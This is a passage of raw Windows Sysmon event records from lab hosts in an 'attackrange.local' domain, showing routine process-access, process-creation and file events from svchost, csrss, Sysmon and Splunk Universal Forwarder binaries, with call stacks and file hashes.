09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D1D-6151-8000-00000000FD01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D1D-6151-8000-00000000FD01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.428{5EBD8912-8D1D-6151-8000-00000000FD01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:34.318{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF20EA58B5E910EBCE8B65B7A69D66FE,SHA256=59FD9C6D9EFAE83EF49024A6D2B7298FBF0B69CE5941E55061D4E95530092A3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055050Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D1E-6151-8200-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.990{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D1E-6151-8200-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.991{5EBD8912-8D1E-6151-8200-00000000FD01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.506{5EBD8912-8D1E-6151-8100-00000000FD01}28962860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.428{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F118D3CEFB37D47527D1CCDCCCE761AA,SHA256=CF114CAE0C44F049FE2146F38CCD03159E0F3867377CE7C58106AA6157C27124,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D1E-6151-8100-00000000FD01}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:34.318{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 